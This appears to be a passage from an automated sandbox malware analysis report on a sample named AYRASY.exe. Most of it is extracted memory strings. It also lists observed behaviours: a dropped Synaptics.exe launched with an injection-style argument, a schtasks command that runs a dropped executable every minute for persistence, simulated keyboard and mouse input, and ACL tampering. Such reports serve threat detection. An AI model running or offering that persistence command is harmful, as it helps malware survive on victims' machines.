Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5hfw
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7mcw
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: 6xh2sc8s\w
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: t0sa3lz2dyw
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7m/w
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: z2nq4ft7qw0z>w
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n2xx6fr2h;w
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: z2nq4ft7qw0z4w
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n2xx6fr2hright1w
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w7mhtw
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w0z
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: m4au8wu2ub8u
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: g8co3jy8iy2r
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n6co9mm7g
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: f6du1ht0ez1y
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: p9fw1cq6d8u`v
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bb6xh2sc8ssv
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: l3cy5rl7mu9tiv
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: m4au8wu2ub8ubv
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: k4rs9cc4y_v
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0axv
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bb6xh2sc8s.v
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: e0yu4to4m+v
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u8eo4bx8x$v
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5h!v
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w7m:v
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: userprofiledir7v
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q8dx2ru2i0v
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v7qr1zj0y
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q8dx2ru2i
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w4a
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0amu
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5h|u
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: o7eg9pv6em4ayu
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7mru
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0aou
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: appdatadirhu
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w^u
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bb6xh2sc8s[u
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7mqu
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: o7eg9pv6em4a*u
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w'u
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0a8s u
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7m6u
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5h3u
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7mu
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: l5me8ge5ileft
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q4th3hp0a4sht
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n8hz1cv2z
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: t9pb8qu1c8s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: 188405025
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: t9pb8qu1cleft
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: t4np7lz8iu9f
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: m8kg8my1klt
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5hit
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0abt
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bo6ji7js7dht
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0aleftxt
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7mut
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q0cx6ts5pi4snt
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q0cx6ts5pi4skt
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v7xl4dd6itdt
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bb6xh2sc8sat
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7mzt
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5hwt
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bb6xh2sc8spt
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w5h-t
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5h&t
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q0cx6ts5pi4s#t
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bo6ji7js7d<t
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q4th3hp0a8s9t
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: q9nf5wu2gh6w2t
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v7qr1zj0y7d
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w5h
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5hos
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2whs
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7mes
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bb6xh2sc8s~s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7m{s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bb6xh2sc8sts
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0aqs
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: w5nu7fc9gz7mjs
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: 6xh2sc8sgs
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u9gp8ha2w7m@s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bo6ji7js7d]s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y0nh9tt7ou5hvs
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: n0bb6xh2sc8sss
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: v0jp1hr0a8s,s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: c6mr6dc7zr3r)s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: p6om9pl1b0e?s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u0sk9xh8ez0e8s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: c6mr6dc7zr3r
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: p6om9pl1b0e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: p6om9pl1b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: u0sk9xh8ez0e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: existsr
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: x4nk4rj5v8s
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: p6om9pl1b7l
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: r2xh3yp1ob7l
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: k4ha7yg1wr6g
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b6gmemstr_3c455601-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b6gnrmemstr_6ca83cc5-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6gkrmemstr_6dd9f404-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b6gdrmemstr_66add8ef-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6mr6dc7zr3rarmemstr_79ab1471-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c7zr3rzrmemstr_81b2db25-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6mr6dc7zr3rwrmemstr_4e8274f1-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: witchprmemstr_ce84b3b5-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6mr6dc7zr3rcrmemstr_518979b1-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6gyrmemstr_0f2ed0b6-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6mr6dc7zr3r(rmemstr_07c34925-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b%rmemstr_9d6a8418-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b4rmemstr_d7dc1b2b-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b1rmemstr_79ed27c9-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6dc7zr3rmemstr_48ce6fc0-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r7qk0sf0amemstr_728ebaf9-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1wl4kx8zv2kmemstr_afed2965-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3xq5wq2ea3mmemstr_4a2b7c12-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l5iw0bj8ze0ymemstr_5903b613-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l8xy4uj5nx0dmemstr_2f7b98ab-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s5gd9ov2tv7ngqmemstr_1bc575e7-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b`qmemstr_f5aab0b2-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1w}qmemstr_bf93cc42-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6mr6dc7zr3rvqmemstr_b58cf074-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3xq5wq2ea3msqmemstr_b11b162f-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1wl4kx8zv2klqmemstr_83fcc800-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6giqmemstr_35b3285d-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s5gd9ov2tv7nbqmemstr_8f76b49f-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6g_qmemstr_d0d9adfc-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s5gd9ov2tv7nuqmemstr_f70e274f-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b6g.qmemstr_e01f635e-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s5gd9ov2tv7n$qmemstr_6d2af0fd-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b6g!qmemstr_19663e6b-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f5xr5ip0nk7c:qmemstr_5f75b214-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1wl4kx8zv2k0qmemstr_31b04440-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f5xr5ip0nk7cmemstr_f1b176c7-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ettypenmemstr_f8d08991-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5ip0nk7cmemstr_9eda6dd6-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1bcmemstr_7f9f9894-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l7bm2gf1uc0mmemstr_dc38858c-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7yg1wr6gmemstr_7a8da1de-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1w6gmemstr_4e6b50a9-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b0dmemstr_df1788f7-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6gmpmemstr_65fa4710-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1bfpmemstr_d3f38cc9-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x8zv2kcpmemstr_2b27e5a6-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l7bm2gf1uc0m|pmemstr_d7817071-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l7bm2gf1uc0mrpmemstr_5c762fdd-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1w0mopmemstr_7d600183-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l7bm2gf1uc0mhpmemstr_88740ac8-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1w6g^pmemstr_e0a27925-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6g[pmemstr_057c53e7-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1wqpmemstr_bddc301f-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1w*pmemstr_f20a135f-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2gf1uc0m'pmemstr_ed421e93-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6g=pmemstr_93e5160f-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1w0m6pmemstr_20d21c2d-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1bpmemstr_73537b04-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1brmemstr_c2c5553b-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s5gd9ov2tv7nmemstr_49ee12cc-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inueloopmemstr_f9374ff8-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1bgmemstr_cca4be63-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6glomemstr_97b293a5-5
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B4B52 SendInput,keybd_event,2_2_001B4B52
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B7DD5 mouse_event,2_2_001B7DD5
                                Source: C:\Users\user\Desktop\AYRASY.exeProcess created: C:\Users\user\Desktop\._cache_AYRASY.exe "C:\Users\user\Desktop\._cache_AYRASY.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001AB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_001AB398
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001ABE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_001ABE31
                                Source: ._cache_AYRASY.exe, YOABSG.exeBinary or memory string: Shell_TrayWnd
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp, YOABSG.exe, 00000009.00000002.2260984456.0000000000A5E000.00000040.00000001.01000000.00000009.sdmp, YOABSG.exe, 0000000C.00000002.2290673125.0000000000A5E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00197254 cpuid 2_2_00197254
